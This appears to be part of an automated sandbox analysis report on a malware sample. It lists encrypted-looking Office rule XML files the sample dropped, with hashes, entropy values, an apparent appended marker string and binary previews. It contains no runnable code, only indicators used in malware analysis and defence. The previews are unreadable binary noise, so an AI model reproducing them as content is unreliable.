                                                                                                                          Preview:<?xmld.......A...C")j.").u.#...v...P..*....h.G..w.&O....$.p'...kC........%...N.&.&...Xg....M.....3.._..#..-^.;..E..-.q..3%..qA...'.....n.d.a\D..#....%..w....b....,...1lF.......a.uE...(............6.{..Or..z. ..E....<e..g.......[.U.2..U.h}..qn.....0SZr.....e...3.u,.E2....%Z..x.s-.......I........uv.....$4)H.^.........3.G-.nR..r..g.k.h*.*...t..j.U....wR..h*`c9....wV...C....i.F...m.6._:q.C..V.0...:.C...b,.l=..w%....U.....PI>w...o.'@..x...._......r.c.'M.E.k......=...L.L$5..W..7>}.l5..t~. ..F....x5..iI5...WAy_DW+..<.....s..2.%....*..t.$..3.miV.r..9...6.`.4;......e...`.h.ae.`.?.u....x.k(.{....Y..-..".k....(.I<..B9.J..O.'`.@.s..{..?hX.b)v.1..iq..w.aH..h".....xw...G....<.]..Ed.Q(........7.q./..........J.h*,........>...;..Du.Z.D4......%w*Z.p..`9..0..x..W.p.Y^....d.[...|".2\.........t<..@.W&0.p......t..g.d.T...L...p.3)...q..v.......n>...{.%(,h.5s\.K.j4U..Pq.......1...I...Y..@...&:}....v....V....[.(<=...x@.6..kq........Zc1..K.'^J.2.F.#.7.|...F"U..!..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11890v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1419
                                                                                                                          Entropy (8bit):7.8763097792082135
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:1ProbYo4UZc1wZGvbWXCz8nb25YTy95nYOL9HZk1wiGbD:Ro54UZceZGvbWM8nbsYTynY0Zk13UD
                                                                                                                          MD5:63093164D2C08228F32DFA23BC6F5B65
                                                                                                                          SHA1:E0AD8F459EA642DC613386D6C261CBF3836C024E
                                                                                                                          SHA-256:5C99D1BDEE6860E95F22CFA0D19B051FCA1341CBE1C9F23B77152D0928CB201C
                                                                                                                          SHA-512:B80B78E3DBC096DA2F7B92F629BFE9BE55F88300FB3C0B75B1B1ABFAC8CA860DAB662E2490388483FE26B9E76F1FA99D96A7B5712AC9981E9C41786D970BD1EC
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....Z.....L3..\.p5..W... .O....V..z0....O..thQ.Q..K.X*.x.s..!?..V?.....U..G..cU.A..n!.rO.F.2......TR.......}..^D.....Y.rl.S.r...\......#.`...cK.T._v......_......).pw..C.vB....U;0=.-....ME%.1......j...m...O.Y..8....<..+.9gP....O....104.o]..A}.w3....n........W..|...k%..4.`.....D~7.U.q':..o_.....%p....y.m.....U...+..\...y...'........a....}..j.8..Z...+.......j. ..{.......6...r...@.F..}....M5/b..W..h@z@.Iq..E ...hZ......*.3|..O......0><.V....,.......WE./m.......?...N.........V....*NlQ_......55.......'.D....Z.t........W...K..X...T`....K............J.S>..l......;"..I.E.j......D.k.{h.Ot..>.c7jE.2....a..X4...=.<.zm....G...9....u....R.-,1D&.Q.Ac...5#.Z..............[.%..H..I_..e;U-..W..?..+.ZMf...M.".._.ey<T.&=....a;.^..4iN6l.."....E..\{BE....Z. .-.3~\R.v..iz..6I.G...g....,.....x...H.o..%.#.Uu4T.|.+9........0.A.?Y."oC~........N2E.....G....80.wo..^...G.....M:....n.cAX..,.4^./......B.......>..zm#...W..=.....22.....hA:..[moq[B.......j....Y.I\...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11930v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1546
                                                                                                                          Entropy (8bit):7.858908920477599
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:lyT798/8c4ykbUrPDPKha2j8rN7Hy6ovj/wspfkUD:l6R64lbUrPbw5Yrdcvbpv
                                                                                                                          MD5:850C6FC7CC497CE04B84591126659817
                                                                                                                          SHA1:BAF97BDEDB5152A04BB4AA85957F6DF4E3AAEAF1
                                                                                                                          SHA-256:17907BFBDC49397B19365F69ABC38A7C90315AB5249A39AA23C181A9637B11E4
                                                                                                                          SHA-512:8F88BB4DF9BFC7BF5FDED9E6593D52A22F180BD4E2388DED9136A4BF01E17B73A33E0808FF945087AA7AFDF29BFE944D6A1FB04F6BC6784D402A480B36E75EDA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.......okmg....mFO.H....#..I@l.;6.m.:..l...4.cow.m>.G.z.s.TiS'....(..@T%E.D6...f.N..[.t..].x8.BE..>..aM...,...B7._..uP.....*..=.-.|....&s:.Ve..\X.......?.........e...C$.Q..1..?5m,.~s.:...[>w1...R... .......O ....Zn..q..y.;.$.C.v...Z..... *..E.F..O...A). u..N.F.!C{..d...f=...}.....,.6.)..]Z6..|8.......K?......O...c.....f..a[.'.8N.=d<.Z...}..c}U.-......,qn..jiF........6...E|.q.v.{G..i..^.I..=..oq.}q"0.9|..r/-....!....e..?.VT...j:.F.)).1...u.Y..C..y."..m...}t|........[D.%|.l.K..w.Mmz.....\....W]5_CH...F..];.G..T.n..K....P[.c.v.R.lu/....O|.Y:WO......@-..+.4$.............E.5......".pD..'.].(.AF..-.Z..:....~..c.ji...O9..F..C...M/...{.bCM..l...Y...!%..2yU}I~./......h.j...Z..k..,Nt.r...bQ..#...S.......,.....9.....1.l...U..l.=9T_...j.>G....>....y.......~.L..e_..If...?....P.Q ......D.....e....9{)y..QA+`1.aJ?L.M....a.0...DV8..,.&q.v-Wy.k....cl...H.q.0.bMH..........he......~.e..T...v....W..UH.?X..[!nzx.V9.$.J.s.....A...?+.t.....t..:

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11931v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):903
                                                                                                                          Entropy (8bit):7.764068963923785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:3s3nb/baL5AgH9CsX35bZd0F07I0EGlUISDvX1bD:3WbzaLPHYi59d00EBD
                                                                                                                          MD5:6B80D207AEA6DAAEB6FB73046BE05EC9
                                                                                                                          SHA1:C8D16FB5ED535C2F1C3236A0C690BB9BCF61414E
                                                                                                                          SHA-256:B069C65366CA7EB486539170E9BC73010539C0800FEBC80AD97D44D45E70FD33
                                                                                                                          SHA-512:3CEED39C041C01E0A258D46FFCF3077360F215C8332F5426850F0589FA24DC24A4F0BD38CA9E0952A99455E239872364D7BE22C24AFBA6BCA5CFB77F2D6E66AA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..P._/..3......t..!..p*...E.a.'...V.'k=Q..~E.)d.6...~.i.3{.W...w..J.YR?B....V%..Ex\....n.1+...A/"v.H...YZ..c.9.s....fA.I.G{..KkY.fA..TtJ...~....".4l.S......'.7Y.[o.Z...M.-.V.=.;..X...&.ujOj7..m....@Y\..-....A.k.J...p..........uJO.....c...S.I...W.r..L..?~9..iM.2.+..`O.&.`..B.:5..M0Y..^..f.|[.].JT.;q.U%a.....82p.B....D.6....M......\w...;iM]..9..zz...w.X*...E.[v...}4..)..u....$/..p..>..iI...+G........M... ...P..C..@j.b.s..?.QB6..1.u.Pf.P..J_.xv.....I.....<.&..'.`.@=...=<..X...........yX...6....J..j~..*.d.....j.p&*I..s.N..L1............j..Q:..^.)0@ ~L...r.a.F!f.S....?.~..0.To...J..L..r...Uo.3yee.ely6...H.f...jZ..vk..,..I.o..9...lAR........Z.p.O..<.....u....p.....L2M).DH.u..].5..l..V.Bu.z...a.L......{....{7...:%..nR..*....H.F-IO..V...P...2Ad4..g0...C..D..5UGa..h6.,.....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11932v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3566
                                                                                                                          Entropy (8bit):7.9527700197880336
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:2pWAr7dD0Dztzm3BlY4gxkDw8mHfZMulwN/l:2p7dAPtzm3g4gcwHfZMbN
                                                                                                                          MD5:CDAE501A66B4EBE4F68BD6F373246097
                                                                                                                          SHA1:657E90C9DF66A8C35656A76131AB4F3A5DBB0CA6
                                                                                                                          SHA-256:A6C0089851F255037857E3255332E6B10D0BAEF507A55B3A28AC2C63384351E1
                                                                                                                          SHA-512:1556377748375018FA21AE1C7EAAA67927BFFC1C5093ABCBDB117652DEA00F273BF1FBFC8C5D5C70B7537489BE81EA1E2982FDB77B2EBC41D151EA31991BC163
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.}.I.kj..c....a^..Ye&....S..lv...U....Q..m.........w...MJ..45.zq\.c..D.rM.....L..C5..dT..B.U..y|.5.J...(....#.I.t..Es..^!.3...za....czb...rJ...B.m.Z.l....rq..;.NS.B.M.!E)..X.h.....<`...L.U...V.B-...K....E.....O....H..M..yw.....Mj....{.W8q............X.".t..s..R/.y.n.Wr.....A.h}.z.w..&<.!#t.......y.0U..u..&B.[........-.*.!.Z.J...2.......zHq.....#.[...zS..<.e.....b...).....L.s....{Z.?._.[.R.N.......E..D.1H;.}..-...x.......H........A...%W...D WE7.$.Yf....B.j.D..W.C....... ....DH...`.k.7.~R2'n......YE.......6........[.fd...."......T....;.JY..T.._....}.......V.QZ.)].1..=......@..y.v.?..k.r..P.p.4....b.6...P.R3.N.......P;z....8w.w...R...N..a..+._..|...7\*.m.......s..y..m.w....s.;..as=.B.8tS...;..)...05..|?..nYG.LK+.%...W..+......H....B...z.A...su..,...sO........?.......i8d{.....2..F...d..X^.zl....m..RJ..%..j}..o7.=..s....g.4...p......B...2..$.:...d...w7.q...'I.7.)......."w....D|..`../!;o..^...m!}.....*W8)..M_.,....*.@\Y.d/J....M'o.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11933v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3677
                                                                                                                          Entropy (8bit):7.944160279532862
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:BJ5PRH9fZDTwd9EmujCAFsGfPkJZjSSgsuY0Cb/QNS+ML:B/19fZo9bXAFrPkLSPYj/USTL
                                                                                                                          MD5:C86487A98E571DD80F0150F6E25E2E00
                                                                                                                          SHA1:695E377B72CD7B5AF01FCDA88A73787278D20D7C
                                                                                                                          SHA-256:0BE144C2B4530701CCB3F94CA29DEC6669154FA903B9181D203A383DFD0F34EF
                                                                                                                          SHA-512:47C8B780DDDBDA8848DC87F19FAC82FE8BC6C972377549F6D49273D580841BE437572CB24132ED1F43E731E9E67E4AC6220F8FFCDF389A35BC211A544D0F1C95
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...pd..'....W.H9...7...$...Bm....=.0-.dIT.3..2G.U..E.B..0.(9.|...P.<.2..e@./E..\AF..[Z.1l....u<YEz...A1{..K$x....6#g.X..E....pg......<.k,..I.J.+.`.....9...gB]........*.JZ..k..........x.g....6.....SE......'..c......e..lt3......n.P.r8.z"..L.Co.c+..eP.yEee>7..l.......zF.[....0..&V...G.h\.i`RA.V..o...k..}../.[M.1._..(6l.he........2.f.\....;.!.iKEj..4t..u.6..a..2Kn.}.V"....5~V.R.?..../.-j.B...1...D..Z.'^\.!.,..b.../+...Hg.L:....M.~J..E....{..?.Aj.0)..]0.b...<.I.~U..6....@...1....j....%Us../.W_...^.B...w<@|r....Z....J......v...B....0O.@...05d.%o....h.J>..a....Q.5..#.!62xBb.f.D..Y`.zioQfO.....q... x.....i?..... v..}g.........[...^...$s...U@........J..e........e.8..S...Z.P...$3Sx..v......vZ.G.........A).9V.t...r.`...O.....<dM>....'.S,..~ ...F`H.R.+:C2...S.B..a._=.I.9@i.../...OKxyS..d,.6...........]....6..U8`.GT..s......~Y.|y`C.Z.....*.."..Q...&....fM...1Z..P.O..gw.Z}}...R......Cuy.k%..._-.|.{4.y9X.........h.&p? ..>.M.6..A..d.#.-..D

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11939v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):744
                                                                                                                          Entropy (8bit):7.739454244681633
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:8PR2Tx7Zjlag/ZpuZB9DC1oMb0FqPjTy5hqZYXVXR+4+RaC8qiVR/CpAB6gq5bTX:ecDL/XuZds1Xy5cCXVXRZ+wh0bD
                                                                                                                          MD5:E38A6759C3BF292958A0C71178119495
                                                                                                                          SHA1:F1B278F2564BA5152D1C9E1C6A6718104D571432
                                                                                                                          SHA-256:70E527C9C59514601688459E8AE4984EDCE0BD6F85F3F801937C69A577859E0C
                                                                                                                          SHA-512:FFA022794F938687AD2C3D22B83381BF4842C8DD0F1D2FB37E515A595F6034D76F6EFCC7D15FCB8467F8FEFBDEBFB8284866A2AF58077181777B55CA426B16F4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....N....xM...a.pBvfw1._@.|...e.Y...~?.;...N..O:....;Wj....=&.jJN@..3.Um>.Dp.L.Ez1Q....Z...E....|.c..^Z.~%.........gr...;o..5.h.T..|..c...b$..eCC._...;../...Lb.$X.*&....T.j...O.o....&&.q..K...........q.A.8Y..m..-..)c...#`q@..B..C...V..!.........f....H......$...N.x.`#dR.8..@....'..d.#6....Y.....|/%D.k.....c..zME.F..w....[..k..e..q\X(..es..=.}.A.J..N...@=.......S.g{ ....[.......p....6aZK!..d.....lb....K0..Ci.*.XL...C.......'..X...=.s...S..7..U.[c.[K..........%........J.B....S..]\....}.5,.....Z..=..@@..?.G..!..?...r.........]G.|qt..?z..,K..~..K......D..(.......!p..C........[.>...V05.D..g.'..6.j.(q:..`l<L.(.CX.m.J..Z`..Hp..h.9phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11950v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1620
                                                                                                                          Entropy (8bit):7.865820189316716
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:ifgR8vNokItUgbpscQ6ZSYzAiQ67ewc8D:agR8NIOgpTRSYEiQ5wT
                                                                                                                          MD5:8E9BBCBEAAF386FA2EE527A4F351FA53
                                                                                                                          SHA1:D0EA17ACEC61B30422E1F3378441F5509BF2B4B6
                                                                                                                          SHA-256:79A193E42A622EFBBFBC8F954915BB33FA33B4CB8815A796ED70E97C06E9A35C
                                                                                                                          SHA-512:CF01D00AF8D7AE1C5C36860775729C935E693F1E3F6B7F833E86EB501546AE1C32C0DFE268C6328A789D94B96379D049D775E2A7C619646B57599295993F76E3
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml .3Z..(y."@.v...f'.`..1.L.!....WSQW:...k...r..h.x.^S...VSy.XF..NdwL(..2.F.g.;.},s.#.ih.+yD.Qg..F!v....7.`.N.......v,.u....8...s........D}].BPQt{X...p..Bi_~..|A.7....2.....)H.;.h..#Yl.s..+..k..sL..".R.t...4.d.!IS....1!.W'.0H...$(...?.....T.,.J.+."k.....e.CS....'...h~....".+..^..ZD.'K7.,V].`.......7.=...p.f.s...&M....g.....Ln.....o.>.....K...h.B......wYb.E....R...a.P.J.L...).'..Q..Wh...........(..1C..n...l..[.{.C..........P....,0.j.Y.]Sl@.....$..T)......cw.~........)........qU.Bt.z4\.....r|.~c.&.>..y...o.8..^..W.....gD..O....g."....Q...~...@O@.|z.G.+#3..-\.p..'......zg\......H.b.n.......~>JG..HHa.x..J..;..7A.Qm..>..4..k7bJ.ff....,R2r.cd.o)....9....;.\...T....,.h..}p..svD..|.............\........0~.......H.4.*H.l?..a....w....W....`).'w..[....E./c.kY..[6g....E...D.I........6$3....I..'D..../.....PA....%._M..I\W...hG.u!4i.1.:..Y!.....T..lL.Y.u#.\(i:.A..........B^;..L.qz/...I..~.C....*..T.f.?...s.ez.]..#.w>..W']...L...C...241.........<

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11981v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):821
                                                                                                                          Entropy (8bit):7.758367351747123
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:R9k0GlJAHeBsy2EL5QUtmbaALBP6LvaskEWXTBDJMbD:R9k0GrAHmiENQhbXLhKvxkPFDJGD
                                                                                                                          MD5:C9BA3255957C720EEDCE00D6DA443FC1
                                                                                                                          SHA1:F6680F08F5C18DBD4377C500ACFD694C6A1FE747
                                                                                                                          SHA-256:F8691F0ED4785B1F836C3951DA8CDACD63AD88F2C03660E158C26D58694A6A8B
                                                                                                                          SHA-512:8AEA22ACB4B04DAFFEB1DB140573DC4F169F4C568FE4554E36BBBA8EE034D5E8E0EA980D522740B6B3F3ED2B7DDC7E389699C562C8C9922569A714BD3E46EC5C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..:2!..H...4.....R..v.....0.w.,t.$.N2..9.;^E.....[g..V.,............>..C.Kq.....&5.......7$..^.........c.t2.VC..$... ....Wd..3N.E. ...._hG/.?.?.b.<.K.6.X.....g...:(.S.<Om..R....%=.,...H....L..W..:r.>..~<.Gm.6 .E5.p.F...'...r(~QH&.....?q=.;.LBk....).&.C.'.....a......K.;.c\Or...{...g..k+..H.".2.......G.Q.%.....2..N.....= Y.'i=1.......7..'j+.....".W~..**'W.q,.6.....%....~.O....Wjh#=.L..X..c.GZ.......v..~..`6i.H.Y-..me0.T.=Q.!?.....^c..$..Q..@..z X......f|.U...).....}.{t...3vT.M..`d.............m..9......3...-S.....%./[I..x......e...+..,=....B..........=...:....1..o.......5t.[nq.G@..G`.%hT+....e.@..J^B..@/;_..n.,.....&..N..._.G.[]%.DQx..zv..U.~N.o.dPjiI/6.`..........6vk...5......c.6.8.Ql ..]...q...fphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11989v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1034
                                                                                                                          Entropy (8bit):7.818689683806823
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:OyivJYGyKE8NouNOpkdzZP1PyUX9LUM21erIiOvWqbD:uBYGydY8kdzWUX9E1QIVeID
                                                                                                                          MD5:186E0803F5D7C33D3F12011EEFAD9D0D
                                                                                                                          SHA1:557C65E11078F17F6FB7813C3FE5D1323AFB7614
                                                                                                                          SHA-256:0EF7954E17F67F98BC0FC1A1119BA841BB876273F8134F8AD325F75F9BBA2D4F
                                                                                                                          SHA-512:F85C0D6A2DF9523013BE3F8D2EBD92011705085166CBDB3EF3B5D7EA917CB0B8E2587C36B31E1AA9B0F9464CF3DBAC1923FEB7B0495773068F8CAE715E9BB85E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml{.Y:...M..~..'../d6.3...M\.9.o.9..]YH..j...Z9........%n.Z..r.$.)...P.D..T..a.....U.s........2V..uc..].....j.R...."P...d.....m...?}....G.P....W....N.r..fv....v....L..r..nw/BC...`d.L>_....?~@U....:..X...u....e+#.....+.......i....u..s.......F.u...7....h....O.....i......... ............{..$.?..A.VO..,..1.u....^..uk.,.|e].r9..J...0 .c:..................M..a.._a.0../.]...?j........J..~$..eu9...X..'.=..;L.z...j...81.o+.G<,6.r.\ .P.....q..wffD....u...o\:.v.1~\...lA.........2.........k<...y$1......A....Q...".lz]`u..P....0........C.M.U.....7....$([wT..pw..a.....m.h.W....I.....}t...........O.f....W.....)mD%...g.5......1Q.....6.s.s>!.V.|Fjaz.$-.tR.c6L.x6....=...|..hn......v...?s..f..'.Y..r..*...ta...i!.BQ..b.:...i..+..9.w..|...}I.....Evpi..pE.x.S..e..f.[....fb....v.e......:...F<.b..........8.{.LOv.#;7d{.MB....,...t.*.z...{....i.b.<..;.|Q....%.X.V.f.....d.H.....K;.k.d...7.....Y........]...........x...7&]Y%..+phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120100v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1333
                                                                                                                          Entropy (8bit):7.832744289070843
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Ayed6LdxS+Hw53dUa/YdmIOtZG/W8704xMsOoiSTJb5PSRpQWvJ8cbD:Ze8LZitN0qPoGFSTJbJ6Hvi2D
                                                                                                                          MD5:08A64FC9A9150AA60AFF655E48E2AFBA
                                                                                                                          SHA1:549967A3CA2C94E75ED6C315A612B21707969A77
                                                                                                                          SHA-256:AB94A0999629538D762194DFE10FE8448D26F33C7763BAD571F7D179366AC911
                                                                                                                          SHA-512:F4EEFB66A347FF76DE42EDA3C96FA7834AB8D072F0ADACD7731BE43A042A9C3255108491F4B9CB0D972AFB86C4E0ED618C0D7C08ADE6CCA0AFA5866DC00BBE53
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlb...t;.5.G.<63`{.\.=D3.q..z..yg..g,.$(....O4V.. ..l.'D...;.d....&...m...M..F...U..'.<..-..@....Z4.RZ.a.>.x...,..-..0eKn....AQh..}/..|...G..fo..........k...?_...-.m..r.........un.v...>..!....(.i....G.......LV.wl.(t.\...W...a!......Z7CL...>...f.A@...:|.R...........b..O..]Z]k...!BYz.?D.b...R...i..xO)+.l...3anG:.{.Y.5..>.pV4.."G.#.E.P|.9.a..2*..U@...p..[.`.&....sO..LU..4.Dx..b..R........p.pg...N5.It..{l..Zo..%.x.U....(._..8.....@Xd.#..h|y....Id].o..."5....E..-..X._.'....).......&.....sY.....L..(.k_.g].6.b8.D4.'}e..p[..#j.|a...8.?.j[.Ue.....fC..<chc...q5..;..z....(....ckw...j....hZ.".O.D....A...4.[.l....-.........1....].....?.\n..Y.A...&..p...I...HSyA...!..8.A. .f .j./..BV.Ii..K..Mts.?........_.....=..m....8..A..|...<:[.......X.".....6V%..$.....!..R._..Z.?s........F~y{r.:......?A]Xr..Y8../.m..W..1j......3{f..C@S^.......Ti#..f .5j.?..........f.....K...5....<..ur....~..=flx.5..(aX......]..@...Nr.>[.....}........]..4.e|,....Z.q...G.L.%..c....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120119v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1665
                                                                                                                          Entropy (8bit):7.88402798463835
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:bMB4N5YeZ5W50RVSIKyUhIpCBXVaVhV1UwD:4mNZ5W+3UhIclVoZ
                                                                                                                          MD5:0B9D4695FA788DB232EADD30E3EDC59B
                                                                                                                          SHA1:1871EB525B42557E701971E4F5EEEF0094EF1148
                                                                                                                          SHA-256:ADCE194FD289110B4E4DF79932A959C097B622F262FBA463013B311059E0EFAF
                                                                                                                          SHA-512:7AF7C024F49E7171032F5E65B7F412C1EEA2BF67F3C0260D25DB1FE43345FC846C4BA43E6B42C776BD0BF33B359040B6896E4641DA1454007C97BDDF88527976
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.`....6..P.!3..[Z'7..8E...(m.;.5.]9Q.=.z.D..9..s9 .a.....i..<b.@.F...^A...F.........].....-....S,.@..)...n../l...M.qd..........m.W.^....8:H..R.O.w.....|...6v.4Z..H]...J+..:......eD.Y..]..M..(.+..+.8"..tp.er...&}...u....f..H..Z......'."&..(..O......{T'.]....].?...m..?..Uv9c6.f......5E...E..t.m.#Um...[+.....b.v..k.'pE........X..+.A.e{...........~..f.x....6}......`..v....0C).........s..G..[.W..y{..{0E..)....l.."I.+...i..BM..V._I.....$....P..2......^.0%......h......(.m...9. ....c.{]h.gq....+2.e..Bx.l..q..5..n?L"......../....g^.5...._S.v..p.i..7.....IC....%..~.....o.....D.v..[z.3_.XJ.).O.....B.s....+...8.B..jT.....;.<...Q.!n...D.....q.Qu....;..J.W.t.m.[..m~.}......>.y>.&<..@....no.-....B...$.......)..q=.b.2.H...d../b..x...\.]2:....,.j.hng....5_.yJ....{.!.b.;[...8.&..l..B..G.k..Z....a.?Dl.Y..(j(7....H$~......2........)$ljp.....e.6..%t..nXj>."p@.P......:........%cF.s..k.....Y..N......P#.!.."QTq80.G\.y.S...wSS.."..t.._]..s....`o.{.d?P..r..]

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120128v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):992
                                                                                                                          Entropy (8bit):7.783043602654567
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:SC22lI/FBdsc2mL9W5gX0hWjmrAdBLFGtKNilcHEXyz8thjbD:SC22lCBkmUKosBQINiOktt5D
                                                                                                                          MD5:BED734C2CB21570F3C00B1A4C45BDBEE
                                                                                                                          SHA1:F6B3F926C754A6DCFA2AEE0E57A710CA780E33A0
                                                                                                                          SHA-256:93EC53A6558C6F6A27BDDD606511D9B1DB1F39705E976906F29B0BA13DE6979C
                                                                                                                          SHA-512:14A791380BD75ED5305C6C0A9C21B136BAB615310EBF62D22231F99C6299523F25873A5FAB66307E656B795BFB0115977741A89F760CD33A930BE529EDE722F1
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?X...U...WE....02%..c9~8........<-...tr..I....|.. .=\.%..V.v.n..l...i..h.V.g.v..3\.v..K dV...X.R)DP.".e#.C.[....*....u...$@>'...%d..k.....K.*..#Q<e......h9..K......[.*rr..v.7..b.*1%..q...i%..f.-......> 4...#+...9..../K].k.P..FKc......q...Z.g,..2...8.].......M..Eqb.0.2..2..........|..0O...8..W<.%FZ..o....'...Y.2ro.....t.a...w.....5CDO......B...C.:#&g..k...>{....c.a..-..R.........6..Q......RM....-.F...U..vX...ntT..4..W....x...)..X^._R23.@`.q.)!!..h.q.28.aEG.RJ.;.G....Y.+9..t...C...:....n....&.]T....G.9..U...c.......e6.@..z..~2.].U..k.R......y. ......[.0.L.q.3..........N.k.5..z..\GtS....a.G.GWi=8..?...B...M......"d...Q.0x..N...q.^0e<..rn..=.+-..T......,..a..X..._....pb.Y.E...=~J/#.n..c..^g.............fp.........o.8.D....$..^...-AS..~...0..b..{1.\T.r....?..bl.../....B...S....y.{....u5..X./&...."....e..q8Y.QQ.S..,. o...+......'.?.o...3....8..._$nB.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule12019v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4150
                                                                                                                          Entropy (8bit):7.9510664580514305
                                                                                                                          Encrypted:false
